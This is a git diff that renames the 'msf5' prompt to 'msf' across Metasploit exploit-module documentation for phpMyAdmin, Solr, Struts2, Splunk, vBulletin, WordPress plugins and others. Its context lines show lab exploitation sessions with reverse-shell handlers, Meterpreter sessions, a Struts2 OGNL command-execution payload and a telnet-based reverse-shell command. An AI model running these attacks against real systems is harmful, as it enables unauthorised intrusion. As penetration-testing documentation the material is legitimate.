b/documentation/modules/exploit/multi/http/phpmyadmin_null_termination_exec.md @@ -37,12 +37,12 @@ when creating a new table as part of the exploit. ### Tested on Windows 7 x64 running phpMyAdmin 4.3.0 on PHP 5.3.8 ``` -msf5 > use exploit/multi/http/phpmyadmin_null_termination_exec -msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set rhost 172.22.222.122 +msf > use exploit/multi/http/phpmyadmin_null_termination_exec +msf exploit(multi/http/phpmyadmin_null_termination_exec) > set rhost 172.22.222.122 rhost => 172.22.222.122 -msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > set database +msf exploit(multi/http/phpmyadmin_null_termination_exec) > set database database => -msf5 exploit(multi/http/phpmyadmin_null_termination_exec) > run +msf exploit(multi/http/phpmyadmin_null_termination_exec) > run [*] Started reverse TCP handler on 172.22.222.177:4444 [*] Sending stage (37775 bytes) to 172.22.222.122 
diff --git a/documentation/modules/exploit/multi/http/phpstudy_backdoor_rce.md b/documentation/modules/exploit/multi/http/phpstudy_backdoor_rce.md index fe5165b415..3d32e41ecc 100644 --- a/documentation/modules/exploit/multi/http/phpstudy_backdoor_rce.md +++ b/documentation/modules/exploit/multi/http/phpstudy_backdoor_rce.md @@ -17,9 +17,9 @@ If your target is vulnerable, you will get a shell. you should see an output similar to the following ``` -msf5 exploit(multi/http/phpstudy_backdoor_rce) > set rhosts 192.168.56.104 +msf exploit(multi/http/phpstudy_backdoor_rce) > set rhosts 192.168.56.104 rhosts => 192.168.56.104 -msf5 exploit(multi/http/phpstudy_backdoor_rce) > run +msf exploit(multi/http/phpstudy_backdoor_rce) > run [*] Started reverse TCP handler on 192.168.56.1:4444 [+] Sending shellcode diff --git a/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md b/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md index 2cc97ec881..5952d28ab9 100644 --- a/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md +++ b/documentation/modules/exploit/multi/http/pimcore_unserialize_rce.md 
@@ -37,18 +37,18 @@ Set up a default installation of Pimcore 4.x or 5.x (e.g.: `composer create-proj ### Tested on Pimcore 5.6.6 ``` -msf5 > use exploit/multi/http/pimcore_unserialize_rce -msf5 exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com +msf > use exploit/multi/http/pimcore_unserialize_rce +msf exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com rhost => target.com -msf5 exploit(multi/http/pimcore_unserialize_rce) > set rport 8566 +msf exploit(multi/http/pimcore_unserialize_rce) > set rport 8566 rport => 8566 -msf5 exploit(multi/http/pimcore_unserialize_rce) > set username admin +msf exploit(multi/http/pimcore_unserialize_rce) > set username admin username => admin -msf5 exploit(multi/http/pimcore_unserialize_rce) > set password pimcore +msf exploit(multi/http/pimcore_unserialize_rce) > set password pimcore password => pimcore -msf5 exploit(multi/http/pimcore_unserialize_rce) > check +msf exploit(multi/http/pimcore_unserialize_rce) > check [*] 192.168.2.59:8566 - The target service is running, but could not be validated. -msf5 exploit(multi/http/pimcore_unserialize_rce) > exploit +msf exploit(multi/http/pimcore_unserialize_rce) > exploit [*] Started reverse TCP handler on 10.0.8.2:4444 [+] Authentication successful: admin:pimcore 
@@ -70,24 +70,24 @@ meterpreter > quit [*] Shutting down Meterpreter... [*] 192.168.2.59 - Meterpreter session 1 closed. Reason: User exit -msf5 exploit(multi/http/pimcore_unserialize_rce) > +msf exploit(multi/http/pimcore_unserialize_rce) > ``` ### Tested on Pimcore 4.6.5 ``` -msf5 > use exploit/multi/http/pimcore_unserialize_rce -msf5 exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com +msf > use exploit/multi/http/pimcore_unserialize_rce +msf exploit(multi/http/pimcore_unserialize_rce) > set rhost target.com rhost => target.com -msf5 exploit(multi/http/pimcore_unserialize_rce) > set rport 8465 +msf exploit(multi/http/pimcore_unserialize_rce) > set rport 8465 rport => 8465 -msf5 exploit(multi/http/pimcore_unserialize_rce) > set username admin +msf exploit(multi/http/pimcore_unserialize_rce) > set username admin username => admin -msf5 exploit(multi/http/pimcore_unserialize_rce) > set password P1mc0r3_4dm1n +msf exploit(multi/http/pimcore_unserialize_rce) > set password P1mc0r3_4dm1n password => P1mc0r3_4dm1n -msf5 exploit(multi/http/pimcore_unserialize_rce) > check +msf exploit(multi/http/pimcore_unserialize_rce) > check [*] 192.168.2.59:8465 - The target service is running, but could not be validated. -msf5 exploit(multi/http/pimcore_unserialize_rce) > exploit +msf exploit(multi/http/pimcore_unserialize_rce) > exploit [*] Started reverse TCP handler on 10.0.8.2:4444 [+] Authentication successful: admin:P1mc0r3_4dm1n @@ -106,5 +106,5 @@ meterpreter > quit [*] Shutting down Meterpreter... [*] 192.168.2.59 - Meterpreter session 1 closed. Reason: User exit -msf5 exploit(multi/http/pimcore_unserialize_rce) > -``` \ No newline at end of file +msf exploit(multi/http/pimcore_unserialize_rce) > +``` diff --git a/documentation/modules/exploit/multi/http/playsms_template_injection.md b/documentation/modules/exploit/multi/http/playsms_template_injection.md index 4e205d5c2a..b512aa71cb 100644 
--- a/documentation/modules/exploit/multi/http/playsms_template_injection.md +++ b/documentation/modules/exploit/multi/http/playsms_template_injection.md @@ -42,7 +42,7 @@ Available at [Source Forge](https://sourceforge.net/projects/playsms/files/plays ### Playsms on Ubuntu Linux ``` -msf5 exploit(multi/http/playsms_template_injection) > options +msf exploit(multi/http/playsms_template_injection) > options Module options (exploit/multi/http/playsms_template_injection): @@ -71,11 +71,11 @@ Exploit target: 0 PlaySMS Before 1.4.3 -msf5 exploit(multi/http/playsms_template_injection) > set rhosts 127.0.0.1 +msf exploit(multi/http/playsms_template_injection) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(multi/http/playsms_template_injection) > set lhost 192.168.1.3 +msf exploit(multi/http/playsms_template_injection) > set lhost 192.168.1.3 lhost => 192.168.1.3 -msf5 exploit(multi/http/playsms_template_injection) > run +msf exploit(multi/http/playsms_template_injection) > run [*] Started reverse TCP handler on 192.168.1.3:4444 [+] X-CSRF-Token for login : c62b21bdb395dca92c18446217e31d7f diff --git a/documentation/modules/exploit/multi/http/rails_double_tap.md b/documentation/modules/exploit/multi/http/rails_double_tap.md index 4257fd3de1..0fa2869ebd 100644 --- a/documentation/modules/exploit/multi/http/rails_double_tap.md +++ b/documentation/modules/exploit/multi/http/rails_double_tap.md @@ -80,9 +80,9 @@ Use Ctrl-C to stop ### Metasploit ``` -msf5 exploit(multi/http/rails_double_tap) > check +msf exploit(multi/http/rails_double_tap) > check [+] 172.16.249.141:3000 - The target is vulnerable. -msf5 exploit(multi/http/rails_double_tap) > exploit +msf exploit(multi/http/rails_double_tap) > exploit [*] Started reverse TCP handler on 172.16.249.1:4444 [*] Attempting to retrieve the application name... 
diff --git a/documentation/modules/exploit/multi/http/solr_velocity_rce.md b/documentation/modules/exploit/multi/http/solr_velocity_rce.md index 8b064ca462..1aa215f47e 100644 --- a/documentation/modules/exploit/multi/http/solr_velocity_rce.md +++ b/documentation/modules/exploit/multi/http/solr_velocity_rce.md @@ -57,16 +57,16 @@ Windows systems have 3 targets: ### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, using PowerShell ``` -msf5 > use exploit/multi/http/solr_velocity_rce -msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155 +msf > use exploit/multi/http/solr_velocity_rce +msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155 RHOSTS => 192.168.137.132 -msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 +msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 LHOST => 192.168.137.128 -msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444 +msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 2 +msf exploit(multi/http/solr_velocity_rce) > set TARGET 2 TARGET => 2 -msf5 exploit(multi/http/solr_velocity_rce) > exploit +msf exploit(multi/http/solr_velocity_rce) > exploit [*] Started reverse TCP handler on 192.168.137.128:4444 [*] Found Apache Solr 8.3.0 
@@ -90,16 +90,16 @@ meterpreter > ### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, using CmdStager ``` -msf5 > use exploit/multi/http/solr_velocity_rce -msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155 +msf > use exploit/multi/http/solr_velocity_rce +msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155 RHOSTS => 192.168.137.132 -msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 +msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 LHOST => 192.168.137.128 -msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444 +msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 3 +msf exploit(multi/http/solr_velocity_rce) > set TARGET 3 TARGET => 3 -msf5 exploit(multi/http/solr_velocity_rce) > exploit +msf exploit(multi/http/solr_velocity_rce) > exploit [*] Started reverse TCP handler on 192.168.137.128:4444 [*] Found Apache Solr 8.3.0 
@@ -138,18 +138,18 @@ meterpreter > ### Windows Server 2019 Datacenter, fully patched, Solr 8.3.0, no authentication, with payload `cmd/windows/generic` ``` -msf5 > use exploit/multi/http/solr_velocity_rce -msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155 +msf > use exploit/multi/http/solr_velocity_rce +msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.155 RHOSTS => 192.168.137.132 -msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 +msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 LHOST => 192.168.137.128 -msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444 +msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 4 +msf exploit(multi/http/solr_velocity_rce) > set TARGET 4 TARGET => 4 -msf5 exploit(multi/http/solr_velocity_rce) > set CMD whoami +msf exploit(multi/http/solr_velocity_rce) > set CMD whoami CMD => whoami -msf5 exploit(multi/http/solr_velocity_rce) > exploit +msf exploit(multi/http/solr_velocity_rce) > exploit [*] Found Apache Solr 8.3.0 [*] OS version is Windows Server 2019 amd64 10.0 
@@ -157,27 +157,27 @@ msf5 exploit(multi/http/solr_velocity_rce) > exploit [*] Targeting core 'techproducts' [+] 2k19dtctr\administrator [*] Exploit completed, but no session was created. -msf5 exploit(multi/http/solr_velocity_rce) > +msf exploit(multi/http/solr_velocity_rce) > ``` ### Bitnami Solr VM 8.3.0, requiring basic authentication, command execution in-memory, with payload `cmd/unix/reverse_bash` ``` -msf5 > use exploit/multi/http/solr_velocity_rce -msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129 +msf > use exploit/multi/http/solr_velocity_rce +msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129 RHOSTS => 192.168.137.129 -msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80 +msf exploit(multi/http/solr_velocity_rce) > set RPORT 80 RPORT => 80 -msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 0 +msf exploit(multi/http/solr_velocity_rce) > set TARGET 0 TARGET => 0 -msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user +msf exploit(multi/http/solr_velocity_rce) > set USERNAME user USERNAME => user -msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5 +msf exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5 PASSWORD => j6lzH82e6Jc5 -msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 +msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 LHOST => 192.168.137.128 -msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444 +msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/http/solr_velocity_rce) > exploit +msf exploit(multi/http/solr_velocity_rce) > exploit [*] Started reverse TCP handler on 192.168.137.128:4444 [*] Found Apache Solr 8.3.0 
@@ -192,24 +192,24 @@ uid=999(solr) gid=1002(solr) groups=1002(solr) ### Bitnami Solr VM 8.3.0, requiring basic authentication, command execution in-memory, with payload `cmd/unix/generic` ``` -msf5 > use exploit/multi/http/solr_velocity_rce -msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129 +msf > use exploit/multi/http/solr_velocity_rce +msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129 RHOSTS => 192.168.137.129 -msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80 +msf exploit(multi/http/solr_velocity_rce) > set RPORT 80 RPORT => 80 -msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 0 +msf exploit(multi/http/solr_velocity_rce) > set TARGET 0 TARGET => 0 -msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user +msf exploit(multi/http/solr_velocity_rce) > set USERNAME user USERNAME => user -msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5 +msf exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5 PASSWORD => j6lzH82e6Jc5 -msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 +msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 LHOST => 192.168.137.128 -msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444 +msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/http/solr_velocity_rce) > set CMD whoami +msf exploit(multi/http/solr_velocity_rce) > set CMD whoami CMD => whoami -msf5 exploit(multi/http/solr_velocity_rce) > exploit +msf exploit(multi/http/solr_velocity_rce) > exploit [*] Started reverse TCP handler on 192.168.137.128:4444 [*] Found Apache Solr 8.3.0 
@@ -218,27 +218,27 @@ msf5 exploit(multi/http/solr_velocity_rce) > exploit [*] Targeting core 'techproducts' [+] solr [*] Exploit completed, but no session was created. -msf5 exploit(multi/http/solr_velocity_rce) > +msf exploit(multi/http/solr_velocity_rce) > ``` ### Bitnami Solr VM 8.3.0, requiring basic authentication, using CmdStager, with payload `linux/x86/meterpreter/reverse_tcp` ``` -msf5 > use exploit/multi/http/solr_velocity_rce -msf5 exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129 +msf > use exploit/multi/http/solr_velocity_rce +msf exploit(multi/http/solr_velocity_rce) > set RHOSTS 192.168.137.129 RHOSTS => 192.168.137.129 -msf5 exploit(multi/http/solr_velocity_rce) > set RPORT 80 +msf exploit(multi/http/solr_velocity_rce) > set RPORT 80 RPORT => 80 -msf5 exploit(multi/http/solr_velocity_rce) > set USERNAME user +msf exploit(multi/http/solr_velocity_rce) > set USERNAME user USERNAME => user -msf5 exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5 +msf exploit(multi/http/solr_velocity_rce) > set PASSWORD j6lzH82e6Jc5 PASSWORD => j6lzH82e6Jc5 -msf5 exploit(multi/http/solr_velocity_rce) > set TARGET 1 +msf exploit(multi/http/solr_velocity_rce) > set TARGET 1 TARGET => 1 -msf5 exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 +msf exploit(multi/http/solr_velocity_rce) > set LHOST 192.168.137.128 LHOST => 192.168.137.128 -msf5 exploit(multi/http/solr_velocity_rce) > set LPORT 4444 +msf exploit(multi/http/solr_velocity_rce) > set LPORT 4444 LPORT => 4444 -msf5 exploit(multi/http/solr_velocity_rce) > exploit +msf exploit(multi/http/solr_velocity_rce) > exploit [*] Started reverse TCP handler on 192.168.137.128:4444 [*] Found Apache Solr 8.3.0 diff --git a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md index 1801c0168f..39e72013c3 100644 --- a/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md 
+++ b/documentation/modules/exploit/multi/http/splunk_upload_app_exec.md @@ -50,12 +50,12 @@ This module has been tested successfully against: ### Tested against 7.2.4 running on OSX 10.14.3 ``` -msf5 exploit(multi/http/splunk_upload_app_exec) > -msf5 exploit(multi/http/splunk_upload_app_exec) > set RHOST 172.16.165.1 +msf exploit(multi/http/splunk_upload_app_exec) > +msf exploit(multi/http/splunk_upload_app_exec) > set RHOST 172.16.165.1 RHOST => 172.16.165.1 -msf5 exploit(multi/http/splunk_upload_app_exec) > set password splunksplunk +msf exploit(multi/http/splunk_upload_app_exec) > set password splunksplunk password => splunksplunk -msf5 exploit(multi/http/splunk_upload_app_exec) > show targets +msf exploit(multi/http/splunk_upload_app_exec) > show targets Exploit targets: @@ -69,9 +69,9 @@ Exploit targets: 5 Splunk >= 5.0.1 / Windows -msf5 exploit(multi/http/splunk_upload_app_exec) > set target 3 +msf exploit(multi/http/splunk_upload_app_exec) > set target 3 target => 3 -msf5 exploit(multi/http/splunk_upload_app_exec) > exploit +msf exploit(multi/http/splunk_upload_app_exec) > exploit [*] Started reverse TCP double handler on 172.16.165.206:4444 [*] Using command: sh -c '(sleep 3733|telnet 172.16.165.206 4444|while : ; do sh && break; done 2>&1|telnet 172.16.165.206 4444 >/dev/null 2>&1 &)' diff --git a/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md b/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md index e27ad3ef7d..0c1caed269 100644 --- a/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md +++ b/documentation/modules/exploit/multi/http/struts2_namespace_ognl.md 
@@ -123,42 +123,42 @@ Checking a vulnerable endpoint, as installed in the above steps: ``` msf > use exploit/multi/http/struts_namespace_ognl -msf5 exploit(multi/http/struts_namespace_ognl) > set RHOSTS 192.168.199.135 -msf5 exploit(multi/http/struts_namespace_ognl) > set RPORT 32771 -msf5 exploit(multi/http/struts_namespace_ognl) > set ACTION help.action +msf exploit(multi/http/struts_namespace_ognl) > set RHOSTS 192.168.199.135 +msf exploit(multi/http/struts_namespace_ognl) > set RPORT 32771 +msf exploit(multi/http/struts_namespace_ognl) > set ACTION help.action ACTION => help.action -msf5 exploit(multi/http/struts_namespace_ognl) > check +msf exploit(multi/http/struts_namespace_ognl) > check [+] 192.168.199.135:32771 The target is vulnerable. ``` Running an arbitrary command on the above-described environment: ``` -msf5 exploit(multi/http/struts_namespace_ognl) > set VERBOSE true -msf5 exploit(multi/http/struts_namespace_ognl) > set PAYLOAD cmd/unix/generic +msf exploit(multi/http/struts_namespace_ognl) > set VERBOSE true +msf exploit(multi/http/struts_namespace_ognl) > set PAYLOAD cmd/unix/generic PAYLOAD => cmd/unix/generic -msf5 exploit(multi/http/struts_namespace_ognl) > set CMD hostname +msf exploit(multi/http/struts_namespace_ognl) > set CMD hostname CMD => hostname -msf5 exploit(multi/http/struts_namespace_ognl) > run +msf exploit(multi/http/struts_namespace_ognl) > run [*] Submitted OGNL: (#_memberAccess['allowStaticMethodAccess']=true).(#cmd='hostname').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush()) [*] Command ran. Output from command: b3d9b350d9b6 [*] Exploit completed, but no session was created. 
-msf5 exploit(multi/http/struts_namespace_ognl) > +msf exploit(multi/http/struts_namespace_ognl) > ``` Getting a Meterpreter session on the above-described environment: ``` -msf5 > use exploit/multi/http/struts2_namespace_ognl -msf5 exploit(multi/http/struts2_namespace_ognl) > set ACTION help.action -msf5 exploit(multi/http/struts2_namespace_ognl) > set RHOSTS 192.168.199.135 -msf5 exploit(multi/http/struts2_namespace_ognl) > set RPORT 32771 -msf5 exploit(multi/http/struts2_namespace_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp -msf5 exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134 -msf5 exploit(multi/http/struts2_namespace_ognl) > run +msf > use exploit/multi/http/struts2_namespace_ognl +msf exploit(multi/http/struts2_namespace_ognl) > set ACTION help.action +msf exploit(multi/http/struts2_namespace_ognl) > set RHOSTS 192.168.199.135 +msf exploit(multi/http/struts2_namespace_ognl) > set RPORT 32771 +msf exploit(multi/http/struts2_namespace_ognl) > set PAYLOAD linux/x64/meterpreter/reverse_tcp +msf exploit(multi/http/struts2_namespace_ognl) > set LHOST 192.168.199.134 +msf exploit(multi/http/struts2_namespace_ognl) > run [*] Started reverse TCP handler on 192.168.199.134:4444 [+] Target profiled successfully: Linux 4.4.0-112-generic amd64, running as root diff --git a/documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md b/documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md index 5b39ecf7fb..8965b0d9d8 100644 --- a/documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md +++ b/documentation/modules/exploit/multi/http/vbulletin_getindexablecontent.md 
@@ -108,17 +108,17 @@ The base URI path of vBulletin. **Default: /** ## Scenarios ``` -msf5 > use exploit/multi/http/vbulletin_getindexablecontent -msf5 exploit(multi/http/vbulletin_getindexablecontent) > set RHOSTS vb.local +msf > use exploit/multi/http/vbulletin_getindexablecontent +msf exploit(multi/http/vbulletin_getindexablecontent) > set RHOSTS vb.local RHOSTS => vb.local -msf5 exploit(multi/http/vbulletin_getindexablecontent) > set VHOST vb.local +msf exploit(multi/http/vbulletin_getindexablecontent) > set VHOST vb.local VHOST => vb.local -msf5 exploit(multi/http/vbulletin_getindexablecontent) > set TARGETURI /vb5 +msf exploit(multi/http/vbulletin_getindexablecontent) > set TARGETURI /vb5 TARGETURI => /vb5 -msf5 exploit(multi/http/vbulletin_getindexablecontent) > set PAYLOAD 2 -msf5 exploit(multi/http/vbulletin_getindexablecontent) > check +msf exploit(multi/http/vbulletin_getindexablecontent) > set PAYLOAD 2 +msf exploit(multi/http/vbulletin_getindexablecontent) > check [*] 192.168.1.100:80 - The target appears to be vulnerable. -msf5 exploit(multi/http/vbulletin_getindexablecontent) > run +msf exploit(multi/http/vbulletin_getindexablecontent) > run [*] Executing automatic check (disable AutoCheck to override) [+] The target appears to be vulnerable. diff --git a/documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md b/documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md index 29a3f0b633..f41db2deaa 100755 --- a/documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md +++ b/documentation/modules/exploit/multi/http/vbulletin_widgetconfig_rce.md 
@@ -44,11 +44,11 @@ Override check result. A proof of concept was originally published on [seclist.org](https://seclists.org/fulldisclosure/2019/Sep/31). ``` -msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > set rhosts 192.168.1.25 +msf exploit(multi/http/vbulletin_widgetconfig_rce) > set rhosts 192.168.1.25 rhosts => 192.168.1.25 -msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > set lhost 192.168.1.13 +msf exploit(multi/http/vbulletin_widgetconfig_rce) > set lhost 192.168.1.13 lhost => 192.168.1.13 -msf5 exploit(multi/http/vbulletin_widgetconfig_rce) > run +msf exploit(multi/http/vbulletin_widgetconfig_rce) > run [*] Started reverse TCP handler on 192.168.1.13:4444 [*] Sending php/meterpreter/reverse_tcp command payload diff --git a/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md b/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md index 2f40d27d6f..6ad92f78e1 100644 --- a/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md +++ b/documentation/modules/exploit/multi/http/vtiger_logo_upload_exec.md @@ -31,14 +31,14 @@ Default: true ### VtigerCRM v6.3.0 tested on Windows 10 x64 (Apache 2.2.26 / PHP 5.3.10) ``` -msf5 > use exploit/multi/http/vtiger_logo_upload_exec -msf5 exploit(multi/http/vtiger_logo_upload_exec) > set rhosts 172.22.222.175 +msf > use exploit/multi/http/vtiger_logo_upload_exec +msf exploit(multi/http/vtiger_logo_upload_exec) > set rhosts 172.22.222.175 rhosts => 172.22.222.175 -msf5 exploit(multi/http/vtiger_logo_upload_exec) > set rport 8899 +msf exploit(multi/http/vtiger_logo_upload_exec) > set rport 8899 rport => 8899 -msf5 exploit(multi/http/vtiger_logo_upload_exec) > set password admin +msf exploit(multi/http/vtiger_logo_upload_exec) > set password admin password => admin -msf5 exploit(multi/http/vtiger_logo_upload_exec) > run +msf exploit(multi/http/vtiger_logo_upload_exec) > run [*] Started reverse TCP handler on 172.22.222.121:4444 [*] Uploading payload: KpXAXQNKjN.php 
diff --git a/documentation/modules/exploit/multi/http/wp_crop_rce.md b/documentation/modules/exploit/multi/http/wp_crop_rce.md index 15e084c29d..0ce2bca4fe 100644 --- a/documentation/modules/exploit/multi/http/wp_crop_rce.md +++ b/documentation/modules/exploit/multi/http/wp_crop_rce.md @@ -35,14 +35,14 @@ the theme cannot be auto-detected. ### Ubuntu 18.04 running WordPress 4.9.8 ``` -msf5 > use exploit/multi/http/wp_crop_rce -msf5 exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1 +msf > use exploit/multi/http/wp_crop_rce +msf exploit(multi/http/wp_crop_rce) > set rhosts 127.0.0.1 rhosts => 127.0.0.1 -msf5 exploit(multi/http/wp_crop_rce) > set username author +msf exploit(multi/http/wp_crop_rce) > set username author username => author -msf5 exploit(multi/http/wp_crop_rce) > set password author +msf exploit(multi/http/wp_crop_rce) > set password author password => author -msf5 exploit(multi/http/wp_crop_rce) > run +msf exploit(multi/http/wp_crop_rce) > run [*] Started reverse TCP handler on 127.0.0.1:4444 [*] Authenticating with WordPress using author:author... diff --git a/documentation/modules/exploit/multi/http/wp_db_backup_rce.md b/documentation/modules/exploit/multi/http/wp_db_backup_rce.md index a3dde99ffc..ba8593f67f 100644 --- a/documentation/modules/exploit/multi/http/wp_db_backup_rce.md +++ b/documentation/modules/exploit/multi/http/wp_db_backup_rce.md 
@@ -30,17 +30,17 @@ ### Tested on wp-database-backup v4.6.5 running Wordpress 5.1 on Ubuntu 18.04 ``` - msf5 exploit(multi/http/wp_db_backup_rce) > set target 1 + msf exploit(multi/http/wp_db_backup_rce) > set target 1 target => 1 - msf5 exploit(multi/http/wp_db_backup_rce) > set rhosts 192.168.37.147 + msf exploit(multi/http/wp_db_backup_rce) > set rhosts 192.168.37.147 rhosts => 192.168.37.147 - msf5 exploit(multi/http/wp_db_backup_rce) > set payload linux/x86/meterpreter/reverse_tcp + msf exploit(multi/http/wp_db_backup_rce) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp - msf5 exploit(multi/http/wp_db_backup_rce) > check + msf exploit(multi/http/wp_db_backup_rce) > check [*] Version of wp-database-backup detected: 4.6 [*] 192.168.37.147:80 - The target appears to be vulnerable. - msf5 exploit(multi/http/wp_db_backup_rce) > run + msf exploit(multi/http/wp_db_backup_rce) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [+] Reached the wp-database-backup settings page 
@@ -64,22 +64,22 @@ ### Tested on wp-database-backup v4.6.5 running Wordpress 5.2 on Windows 10 ``` - msf5 > use exploit/multi/http/wp_db_backup_rce - msf5 exploit(multi/http/wp_db_backup_rce) > set rhosts 192.168.37.144 + msf > use exploit/multi/http/wp_db_backup_rce + msf exploit(multi/http/wp_db_backup_rce) > set rhosts 192.168.37.144 rhosts => 192.168.37.144 - msf5 exploit(multi/http/wp_db_backup_rce) > set payload windows/x64/meterpreter/reverse_tcp + msf exploit(multi/http/wp_db_backup_rce) > set payload windows/x64/meterpreter/reverse_tcp payload => windows/x64/meterpreter/reverse_tcp - msf5 exploit(multi/http/wp_db_backup_rce) > set username user + msf exploit(multi/http/wp_db_backup_rce) > set username user username => user - msf5 exploit(multi/http/wp_db_backup_rce) > set password password + msf exploit(multi/http/wp_db_backup_rce) > set password password password => password - msf5 exploit(multi/http/wp_db_backup_rce) > set lhost 192.168.37.1 + msf exploit(multi/http/wp_db_backup_rce) > set lhost 192.168.37.1 lhost => 192.168.37.1 - msf5 exploit(multi/http/wp_db_backup_rce) > check + msf exploit(multi/http/wp_db_backup_rce) > check [*] Version of wp-database-backup detected: 4.6 [*] 192.168.37.144:80 - The target appears to be vulnerable. - msf5 exploit(multi/http/wp_db_backup_rce) > run + msf exploit(multi/http/wp_db_backup_rce) > run [*] Started reverse TCP handler on 192.168.37.1:4444 [+] Reached the wp-database-backup settings page diff --git a/documentation/modules/exploit/multi/http/wp_responsive_thumbnail_slider_upload.md b/documentation/modules/exploit/multi/http/wp_responsive_thumbnail_slider_upload.md index 10d3832cd9..3034579449 100644 --- a/documentation/modules/exploit/multi/http/wp_responsive_thumbnail_slider_upload.md +++ b/documentation/modules/exploit/multi/http/wp_responsive_thumbnail_slider_upload.md 
